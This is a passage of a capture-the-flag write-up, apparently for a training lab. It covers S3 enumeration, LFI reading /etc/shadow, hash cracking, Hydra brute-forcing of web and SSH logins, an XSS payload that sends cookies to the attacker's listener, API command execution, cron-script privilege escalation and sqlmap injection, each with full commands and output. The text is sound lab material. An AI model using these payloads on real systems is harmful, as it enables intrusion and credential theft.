Answer: {% spoiler `employee_names.txt` %}

> McSkidy's only starting point is a single bucket name: advent-bucket-one

Enum public files from the S3 bucket:

```
$ aws-extender-cli -b advent-bucket-one -s S3
===== (advent-bucket-one) =====
[*] s3:GetBucketAcl
        * http://acs.amazonaws.com/groups/global/AllUsers->READ
        * http://acs.amazonaws.com/groups/global/AllUsers->WRITE
        * http://acs.amazonaws.com/groups/global/AllUsers->READ_ACP
        * ashusavani->READ
        * ashusavani->READ_ACP
[*] s3:ListMultipartUploadParts
[*] s3:ListBucket
        * employee_names.txt
[*] s3:PutObject
        * test.txt
```

> What is in the file?

Answer: {% spoiler `mcchef` %}

```
$ curl http://advent-bucket-one.s3.amazonaws.com/employee_names.txt
```

## [Day 15] LFI

> What is Charlie going to book a holiday to?

Answer: {% spoiler `Hawaii` %}

Service scan:

```
$ sudo nmap -sSVC -p- 10.10.166.182 -v
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:1f:02:a8:fd:8c:b8:11:b2:33:54:cb:b6:7b:cb:76 (RSA)
|   256 21:44:7d:e6:ca:66:76:2b:98:c5:31:d3:dc:5e:01:1b (ECDSA)
|_  256 dd:9a:7b:ca:ce:fc:99:a0:98:e4:36:74:c7:96:7d:5e (ED25519)
80/tcp open  http    Node.js (Express middleware)
|_http-favicon: Unknown favicon MD5: DBC69DB56435575CDC5CF45C96045958
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Public Notes
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
```

On http://10.10.166.182/ we can see a todolist on Note 3.

> Read /etc/shadow and crack Charlies password.

Answer: {% spoiler `password1` %}

If you look at the source or network trafic

```javascript
      function getNote(note, id) {
        const url = '/get-file/' + note.replace(/\//g, '%2f')
        $.getJSON(url,  function(data) {
          document.querySelector(id).innerHTML = data.info.replace(/(?:\r\n|\r|\n)/g, '<br>');
        })
      }
      // getNote('server.js', '#note-1')
      getNote('views/notes/note1.txt', '#note-1')
      getNote('views/notes/note2.txt', '#note-2')
      getNote('views/notes/note3.txt', '#note-3')
```

The notes are requested like that: http://10.10.166.182/get-file/views%2fnotes%2fnote1.txt

```
$ curl http://10.10.166.182/get-file/%2fetc%2fpasswd -s | jq
{
  "success": true,
  "info": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\nsyslog:x:104:108::/home/syslog:/bin/false\n_apt:x:105:65534::/nonexistent:/bin/false\nlxd:x:106:65534::/var/lib/lxd/:/bin/false\nmessagebus:x:107:111::/var/run/dbus:/bin/false\nuuidd:x:108:112::/run/uuidd:/bin/false\ndnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false\nsshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin\npollinate:x:111:1::/var/cache/pollinate:/bin/false\nubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash\ncharlie:x:1001:1001:Charlie the Elf,,,:/home/charlie:/bin/bash\n"
}
```

Or we can also paste `getNote('/etc/passwd', '#note-3');` in the JS console.

Now let's find hashes: `getNote('/etc/shadow', '#note-3');`:

```
root:*:18152:0:99999:7:::
daemon:*:18152:0:99999:7:::
bin:*:18152:0:99999:7:::
sys:*:18152:0:99999:7:::
sync:*:18152:0:99999:7:::
games:*:18152:0:99999:7:::
man:*:18152:0:99999:7:::
lp:*:18152:0:99999:7:::
mail:*:18152:0:99999:7:::
news:*:18152:0:99999:7:::
uucp:*:18152:0:99999:7:::
proxy:*:18152:0:99999:7:::
www-data:*:18152:0:99999:7:::
backup:*:18152:0:99999:7:::
list:*:18152:0:99999:7:::
irc:*:18152:0:99999:7:::
gnats:*:18152:0:99999:7:::
nobody:*:18152:0:99999:7:::
systemd-timesync:*:18152:0:99999:7:::
systemd-network:*:18152:0:99999:7:::
systemd-resolve:*:18152:0:99999:7:::
systemd-bus-proxy:*:18152:0:99999:7:::
syslog:*:18152:0:99999:7:::
_apt:*:18152:0:99999:7:::
lxd:*:18152:0:99999:7:::
messagebus:*:18152:0:99999:7:::
uuidd:*:18152:0:99999:7:::
dnsmasq:*:18152:0:99999:7:::
sshd:*:18152:0:99999:7:::
pollinate:*:18152:0:99999:7:::
ubuntu:!:18243:0:99999:7:::
charlie:$6$oHymLspP$wTqsTmpPkz.u/CQDbheQjwwjyYoVN2rOm6CDu0KDeq8mN4pqzuna7OX.LPdDPCkPj7O9TB0rvWfCzpEkGOyhL.:18243:0:99999:7:::
```

Crack the hash:

```
$ john hash.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt
```

> What is flag1.txt?

Answer: {% spoiler `THM{4ea2adf842713ad3ce0c1f05ef12256d}` %}

Obvious:

```
$ ssh charlie@10.10.166.182
...
charlie@ip-10-10-166-182:~$ cat flag1.txt
THM{4ea2adf842713ad3ce0c1f05ef12256d}
```

## [Day 16] File Confusion

> How many files did you extract(excluding all the .zip files)

Answer: {% spoiler `50` %}

My dirty ruby script to solve this (which is specific to this problem, not re-usable nor recursive):

```ruby
#!/usr/bin/env ruby

require 'zip'

files_extracted = 0
files_11 = 0
password = ''

extract_next = []

Zip::File.open('final-final-compressed.zip') do |zip_file|
    zip_file.each do |entry|
        entry.extract
        files_extracted += 1 unless entry.name[-4..] == '.zip'
        extract_next.push(entry.name) if entry.name[-4..] == '.zip'
    end
end

extract_next.each do |filename|
    Zip::File.open(filename) do |zip_file|
        zip_file.each do |entry|
            entry.extract
            files_extracted += 1 unless entry.name[-4..] == '.zip'
            content = entry.get_input_stream.read
            password = entry.name if /password/i.match?(content)
            files_11 +=1 if /version.+1.1/i.match?(content)
        end
    end
end

puts "Files extracted : #{files_extracted}"
puts "Files with Version: 1.1 : #{files_11}"
puts "File containing password : #{password}"
```

```
$ ruby zip.rb
Files extracted : EDITED
Files with Version: 1.1 : EDITED
File containing password : EDITED
```

> How many files contain Version: 1.1 in their metadata?

Answer: {% spoiler `3` %}

> Which file contains the password?

Answer: {% spoiler `dL6w.txt` %}

## [Day 17] Hydra-ha-ha-haa

> Use Hydra to bruteforce molly's web password. What is flag 1? (The flag is mistyped, its THM, not TMH)

Answer: {% spoiler `THM{2673a7dd116de68e85c48ec0b1f2612e}` %}

HHTP form bruteforce:

```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect'
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:49:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.162.26:80/login:username=^USER^&password=^PASS^:F=incorrect
[80][http-post-form] host: 10.10.162.26   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:50:02
```

> Use Hydra to bruteforce molly's SSH password. What is flag 2?

Answer: {% spoiler `THM{c8eeb0468febbadea859baeb33b2541b}` %}

SSH bruteforce:

```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:48:34
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.162.26:22/
[22][ssh] host: 10.10.162.26   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:49:26
```

## [Day 18] ELF JS

> What is the admin's authid cookie value?

Answer: {% spoiler `2564799a4e6689972f6d9e1c7b406f87065cbf65` %}

Web server listening:

```
$ ruby -run -ehttpd . -p8080
```

XSS payload to steal cookies:

```html
<script>document.location='http://10.9.19.77:8080/?c='+document.cookie</script>
```

Logs:

```
10.9.19.77 - - [29/Nov/2020:16:59:50 CET] "GET /?c=authid=c32258485b0c6532df1df72d493c382ddf34c9ae HTTP/1.1" 200 1419
http://10.10.40.148:3000/home -> /?c=authid=c32258485b0c6532df1df72d493c382ddf34c9ae
[2020-11-29 16:59:50] ERROR `/favicon.ico' not found.
10.9.19.77 - - [29/Nov/2020:16:59:50 CET] "GET /favicon.ico HTTP/1.1" 404 282
http://10.9.19.77:8080/?c=authid=c32258485b0c6532df1df72d493c382ddf34c9ae -> /favicon.ico
10.10.40.148 - - [29/Nov/2020:17:00:09 CET] "GET /?c=authid=REDACTED HTTP/1.1" 200 1419
http://localhost:3000/admin -> /?c=authid=REDACTED
```

## [Day 19] Commands

> What are the contents of the user.txt file?

Answer: {% spoiler `5W7WkjxBWwhe3RNsWJ3Q` %}

Let's execute a few basic Linux commands through the API RCE:

```
$ curl http://10.10.134.182:3000/api/cmd
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /api/cmd</pre>
</body>
</html>

$ curl http://10.10.134.182:3000/api/cmd/id -s | jq
{
  "stdout": "uid=0(root) gid=0(root) groups=0(root)\n",
  "stderr": ""
}

$ curl 'http://10.10.134.182:3000/api/cmd/ls' -s | jq
{
  "stdout": "bin\nboot\ndata\ndev\netc\nhome\nlib\nlib64\nlocal\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n",
  "stderr": ""
}

$ curl 'http://10.10.134.182:3000/api/cmd/pwd' -s | jq
{
  "stdout": "/\n",
  "stderr": ""
}

$ curl 'http://10.10.134.182:3000/api/cmd/ls%20home' -s | jq
{
  "stdout": "bestadmin\nec2-user\n",
  "stderr": ""
}

$ curl 'http://10.10.134.182:3000/api/cmd/ls%20home%2fbestadmin' -s | jq
{
  "stdout": "bin\nnew-room\nrun.sh\nuser.txt\n",
  "stderr": ""
}

$ curl 'http://10.10.134.182:3000/api/cmd/cat%20home%2fbestadmin%2fuser.txt' -s | jq
```

## [Day 20] Cronjob Privilege Escalation

> What port is SSH running on?

Answer: {% spoiler `4567` %}

Service scan:

```
$ sudo nmap -sSVC -p- 10.10.206.220 -v
...
PORT     STATE SERVICE VERSION
4567/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b6:1c:3e:64:9a:6e:62:98:45:7b:d6:b5:37:2d:e4 (RSA)
|   256 87:16:c5:f5:0b:33:47:64:c7:c8:3e:b1:fc:da:60:c5 (ECDSA)
|_  256 3e:bf:51:b8:4b:f8:3b:f9:65:65:c8:87:9f:f7:a5:2b (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
```

> Crack sam's password and read flag1.txt

Answer: {% spoiler `THM{dec4389bc09669650f3479334532aeab}` %}

Again SSH bruteforce:

```
$ hydra -l sam -P /usr/share/wordlists/passwords/rockyou.txt 10.10.206.220 -t 4 ssh -s 4567
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 17:56:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.206.220:4567/
[4567][ssh] host: 10.10.206.220   login: sam   password: chocolate
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 17:56:57

$ ssh sam@10.10.206.220 -p 4567

sam@ip-10-10-206-220:~$ cat flag1.txt
```

> Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?

Answer: {% spoiler `THM{b27d33705f97ba2e1f444ec2da5f5f61}` %}

Flag2 is in `/home/ubuntu/`.

We can't see cron jobs owned by other users.

But we foudn this:

```
sam@ip-10-10-206-220:~$ ls -lhA /home/scripts/
total 8.0K
-rwxrwxrwx 1 ubuntu ubuntu 14 Dec 19  2019 clean_up.sh
-rw-r--r-- 1 root   root    5 Dec 19  2019 test.txt

sam@ip-10-10-206-220:~$ cat /home/scripts/clean_up.sh
rm -rf /tmp/*
```

It could be used by a cron job. To verify that we just have to put some
files in `/tmp/` and see if it disapears.

After 1min or less it's removed so it's used by a cron job. And this script
is writable by everyone.

Let's modify it:

```
sam@ip-10-10-206-220:~$ vim /home/scripts/clean_up.sh
sam@ip-10-10-206-220:~$ cat /home/scripts/clean_up.sh
chmod 444 /home/ubuntu/flag2.txt
sam@ip-10-10-206-220:~$ cat /home/ubuntu/flag2.txt
```

## [Day 21] Reverse Elf-ineering

> What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?

Answer: {% spoiler `1` %}

Try the [Intro to x86-64](https://tryhackme.com/room/introtox8664) room to
understand basic x86-64 assembly instructions, radare2 commands and reverse
engineering.

```
$ r2 -d challenge1

[0x00400a30]> aaa

[0x00400a30]> e asm.syntax=att

[0x00400a30]> pdf @main
            ; DATA XREF from entry0 @ 0x400a4d
┌ 35: int main (int argc, char **argv, char **envp);
│           ; var int64_t var_ch @ rbp-0xc
│           ; var int64_t var_8h @ rbp-0x8
│           ; var int64_t var_4h @ rbp-0x4
│           0x00400b4d      55             pushq %rbp
│           0x00400b4e      4889e5         movq %rsp, %rbp
│           0x00400b51      c745f4010000.  movl $1, var_ch
│           0x00400b58      c745f8060000.  movl $6, var_8h
│           0x00400b5f      8b45f4         movl var_ch, %eax
│           0x00400b62      0faf45f8       imull var_8h, %eax
│           0x00400b66      8945fc         movl %eax, var_4h
│           0x00400b69      b800000000     movl $0, %eax
│           0x00400b6e      5d             popq %rbp
└           0x00400b6f      c3             retq

[0x00400a30]> db 0x00400b51
[0x00400a30]> db 0x00400b62
[0x00400a30]> db 0x00400b69


[0x00400a30]> pdf @main
            ; DATA XREF from entry0 @ 0x400a4d
┌ 35: int main (int argc, char **argv, char **envp);
│           ; var int64_t var_ch @ rbp-0xc
│           ; var int64_t var_8h @ rbp-0x8
│           ; var int64_t var_4h @ rbp-0x4
│           0x00400b4d      55             pushq %rbp
│           0x00400b4e      4889e5         movq %rsp, %rbp
│           0x00400b51 b    c745f4010000.  movl $1, var_ch
│           0x00400b58      c745f8060000.  movl $6, var_8h
│           0x00400b5f      8b45f4         movl var_ch, %eax
│           0x00400b62 b    0faf45f8       imull var_8h, %eax
│           0x00400b66      8945fc         movl %eax, var_4h
│           0x00400b69 b    b800000000     movl $0, %eax
│           0x00400b6e      5d             popq %rbp
└           0x00400b6f      c3             retq

[0x00400a30]> dc
hit breakpoint at: 400b51

[0x00400b51]> px @rbp-0xc
- offset -       0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x7ffc2cc40974  0000 0000 1890 6b00 0000 0000 4018 4000  ......k.....@.@.
0x7ffc2cc40984  0000 0000 e910 4000 0000 0000 0000 0000  ......@.........
0x7ffc2cc40994  0000 0000 0000 0000 0100 0000 a80a c42c  ...............,
0x7ffc2cc409a4  fc7f 0000 4d0b 4000 0000 0000 0000 0000  ....M.@.........
0x7ffc2cc409b4  0000 0000 1700 0000 0100 0000 0000 0000  ................
0x7ffc2cc409c4  0000 0000 0000 0000 0100 0000 0000 0000  ................
0x7ffc2cc409d4  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc409e4  0000 0000 0000 0000 0000 0000 0004 4000  ..............@.
0x7ffc2cc409f4  0000 0000 4df7 672d 3602 6b7b e018 4000  ....M.g-6.k{..@.
0x7ffc2cc40a04  0000 0000 0000 0000 0000 0000 1890 6b00  ..............k.
0x7ffc2cc40a14  0000 0000 0000 0000 0000 0000 4df7 c70e  ............M...
0x7ffc2cc40a24  3e5b 9384 4df7 d33c 3602 6b7b 0000 0000  >[..M..<6.k{....
0x7ffc2cc40a34  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a44  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a54  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a64  0000 0000 0000 0000 0000 0000 0000 0000  ................
[0x00400b51]> ds
[0x00400b58]> px @rbp-0xc
- offset -       0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x7ffc2cc40974  0100 0000 1890 6b00 0000 0000 4018 4000  ......k.....@.@.
0x7ffc2cc40984  0000 0000 e910 4000 0000 0000 0000 0000  ......@.........
0x7ffc2cc40994  0000 0000 0000 0000 0100 0000 a80a c42c  ...............,
0x7ffc2cc409a4  fc7f 0000 4d0b 4000 0000 0000 0000 0000  ....M.@.........
0x7ffc2cc409b4  0000 0000 1700 0000 0100 0000 0000 0000  ................
0x7ffc2cc409c4  0000 0000 0000 0000 0100 0000 0000 0000  ................
0x7ffc2cc409d4  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc409e4  0000 0000 0000 0000 0000 0000 0004 4000  ..............@.
0x7ffc2cc409f4  0000 0000 4df7 672d 3602 6b7b e018 4000  ....M.g-6.k{..@.
0x7ffc2cc40a04  0000 0000 0000 0000 0000 0000 1890 6b00  ..............k.
0x7ffc2cc40a14  0000 0000 0000 0000 0000 0000 4df7 c70e  ............M...
0x7ffc2cc40a24  3e5b 9384 4df7 d33c 3602 6b7b 0000 0000  >[..M..<6.k{....
0x7ffc2cc40a34  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a44  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a54  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a64  0000 0000 0000 0000 0000 0000 0000 0000  ................
```

> What is the value of eax when the imull instruction is called?

Answer: {% spoiler `6` %}

```
[0x00400b58]> dc
hit breakpoint at: 400b62
[0x00400b62]> ds
[0x00400b66]> dr
rax = 0x00000006
rbx = 0x00400400
rcx = 0x0044b9a0
rdx = 0x7ffc2cc40ab8
r8 = 0x01000000
r9 = 0x006bb8e0
r10 = 0x00000015
r11 = 0x00000000
r12 = 0x004018e0
r13 = 0x00000000
r14 = 0x006b9018
r15 = 0x00000000
rsi = 0x7ffc2cc40aa8
rdi = 0x00000001
rsp = 0x7ffc2cc40980
rbp = 0x7ffc2cc40980
rip = 0x00400b66
rflags = 0x00000246
orax = 0xffffffffffffffff
```

> What is the value of local_4h before eax is set to 0?

Answer: {% spoiler `6` %}

```
[0x00400b66]> dc
hit breakpoint at: 400b69
[0x00400b69]> px @rbp-0x4
- offset -       0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x7ffc2cc4097c  0600 0000 4018 4000 0000 0000 e910 4000  ....@.@.......@.
0x7ffc2cc4098c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc4099c  0100 0000 a80a c42c fc7f 0000 4d0b 4000  .......,....M.@.
0x7ffc2cc409ac  0000 0000 0000 0000 0000 0000 1700 0000  ................
0x7ffc2cc409bc  0100 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc409cc  0100 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc409dc  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc409ec  0000 0000 0004 4000 0000 0000 4df7 672d  ......@.....M.g-
0x7ffc2cc409fc  3602 6b7b e018 4000 0000 0000 0000 0000  6.k{..@.........
0x7ffc2cc40a0c  0000 0000 1890 6b00 0000 0000 0000 0000  ......k.........
0x7ffc2cc40a1c  0000 0000 4df7 c70e 3e5b 9384 4df7 d33c  ....M...>[..M..<
0x7ffc2cc40a2c  3602 6b7b 0000 0000 0000 0000 0000 0000  6.k{............
0x7ffc2cc40a3c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a4c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a5c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffc2cc40a6c  0000 0000 0000 0000 0000 0000 0000 0000  ................
```

## [Day 22] If Santa, Then Christmas

> what is the value of local_8h before the end of the main function?

Answer: {% spoiler `9` %}

Try the [Intro to x86-64](https://tryhackme.com/room/introtox8664) room to
understand basic x86-64 assembly instructions, radare2 commands and reverse
engineering.

```
$ r2 -d if2
Process with PID 136549 started...
= attach 136549 136549
bin.baddr 0x00400000
Using 0x400000
asm.bits 64
 -- We don't make mistakes... just happy little segfaults.
[0x00400a30]> aaa
[Invalid address from 0x004843bcith sym. and entry0 (aa)
Invalid address from 0x0044efd6
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[TOFIX: aaft can't run in debugger mode.ions (aaft)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00400a30]> e asm.syntax=att
[0x00400a30]> afl | grep main
0x00400df0  114 1657         sym.__libc_start_main
0x0048fa50   16 247  -> 237  sym._nl_unload_domain
0x00403af0  308 5366 -> 5301 sym._nl_load_domain
0x00470440    1 49           sym._IO_switch_to_main_wget_area
0x00403850   39 672  -> 640  sym._nl_find_domain
0x00400b4d    4 43           main
0x0048fa00    7 73   -> 69   sym._nl_finddomain_subfreeres
0x0044ce20    1 8            sym._dl_get_dl_main_map
0x00415f00    1 43           sym._IO_switch_to_main_get_area
[0x00400a30]> pdf @main
            ; DATA XREF from entry0 @ 0x400a4d
┌ 43: int main (int argc, char **argv, char **envp);
│           ; var int64_t var_8h @ rbp-0x8
│           ; var int64_t var_4h @ rbp-0x4
│           0x00400b4d      55             pushq %rbp
│           0x00400b4e      4889e5         movq %rsp, %rbp
│           0x00400b51      c745f8080000.  movl $8, var_8h
│           0x00400b58      c745fc020000.  movl $2, var_4h
│           0x00400b5f      8b45f8         movl var_8h, %eax
│           0x00400b62      3b45fc         cmpl var_4h, %eax
│       ┌─< 0x00400b65      7e06           jle 0x400b6d
│       │   0x00400b67      8345f801       addl $1, var_8h
│      ┌──< 0x00400b6b      eb04           jmp 0x400b71
│      ││   ; CODE XREF from main @ 0x400b65
│      │└─> 0x00400b6d      8345fc07       addl $7, var_4h
│      │    ; CODE XREF from main @ 0x400b6b
│      └──> 0x00400b71      b800000000     movl $0, %eax
│           0x00400b76      5d             popq %rbp
└           0x00400b77      c3             retq
[0x00400a30]> db 0x00400b71
[0x00400a30]> dc
hit breakpoint at: 400b71
[0x00400b71]> px @rbp-0x8
- offset -       0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x7ffdbb4b1fc8  0900 0000 0200 0000 5018 4000 0000 0000  ........P.@.....
0x7ffdbb4b1fd8  f910 4000 0000 0000 0000 0000 0000 0000  ..@.............
0x7ffdbb4b1fe8  0000 0000 0100 0000 f820 4bbb fd7f 0000  ......... K.....
0x7ffdbb4b1ff8  4d0b 4000 0000 0000 0000 0000 0000 0000  M.@.............
0x7ffdbb4b2008  1700 0000 0100 0000 0000 0000 0000 0000  ................
0x7ffdbb4b2018  0000 0000 0100 0000 0000 0000 0000 0000  ................
0x7ffdbb4b2028  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b2038  0000 0000 0000 0000 0004 4000 0000 0000  ..........@.....
0x7ffdbb4b2048  0ca9 1fc6 f66e 14fe f018 4000 0000 0000  .....n....@.....
0x7ffdbb4b2058  0000 0000 0000 0000 1890 6b00 0000 0000  ..........k.....
0x7ffdbb4b2068  0000 0000 0000 0000 0ca9 7fc9 e018 ef01  ................
0x7ffdbb4b2078  0ca9 ebd7 f66e 14fe 0000 0000 0000 0000  .....n..........
0x7ffdbb4b2088  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b2098  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b20a8  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b20b8  0000 0000 0000 0000 0000 0000 0000 0000  ................
```

> what is the value of local_4h before the end of the main function?

Answer: {% spoiler `2` %}

```
[0x00400b71]> px @rbp-0x4
- offset -       0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x7ffdbb4b1fcc  0200 0000 5018 4000 0000 0000 f910 4000  ....P.@.......@.
0x7ffdbb4b1fdc  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b1fec  0100 0000 f820 4bbb fd7f 0000 4d0b 4000  ..... K.....M.@.
0x7ffdbb4b1ffc  0000 0000 0000 0000 0000 0000 1700 0000  ................
0x7ffdbb4b200c  0100 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b201c  0100 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b202c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b203c  0000 0000 0004 4000 0000 0000 0ca9 1fc6  ......@.........
0x7ffdbb4b204c  f66e 14fe f018 4000 0000 0000 0000 0000  .n....@.........
0x7ffdbb4b205c  0000 0000 1890 6b00 0000 0000 0000 0000  ......k.........
0x7ffdbb4b206c  0000 0000 0ca9 7fc9 e018 ef01 0ca9 ebd7  ................
0x7ffdbb4b207c  f66e 14fe 0000 0000 0000 0000 0000 0000  .n..............
0x7ffdbb4b208c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b209c  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b20ac  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x7ffdbb4b20bc  0000 0000 0000 0000 0000 0000 0000 0000  ................
```

## [Day 23] LapLANd (SQL Injection)

> Which field is SQL injectable? Use the input name used in the HTML code.

Answer: {% spoiler `log_email` %}

Classic SQLi exploitation with SQLmap, nothing much to add:

```
$ sqlmap --method POST -u http://10.10.95.214/register.php --data 'log_email=noraj@toto.fr&log_password=noraj&login_button=Login'
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not re
sponsible for any misuse or damage caused by this program

[*] starting @ 19:18:23 /2020-11-29/

[19:18:24] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=dgs5jd152jp...112bg95coi'). Do you want to use those [Y/n] y
[19:18:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:18:28] [INFO] testing if the target URL content is stable
[19:18:28] [INFO] target URL content is stable
[19:18:28] [INFO] testing if POST parameter 'log_email' is dynamic
[19:18:29] [WARNING] POST parameter 'log_email' does not appear to be dynamic
[19:18:29] [WARNING] heuristic (basic) test shows that POST parameter 'log_email' might not be injectable
[19:18:29] [INFO] heuristic (XSS) test shows that POST parameter 'log_email' might be vulnerable to cross-site scripting (XSS) attacks
[19:18:29] [INFO] testing for SQL injection on POST parameter 'log_email'
[19:18:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:18:29] [WARNING] reflective value(s) found and filtering out
[19:18:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:18:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:18:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:18:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:18:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:18:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:18:31] [INFO] testing 'Generic inline queries'
[19:18:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
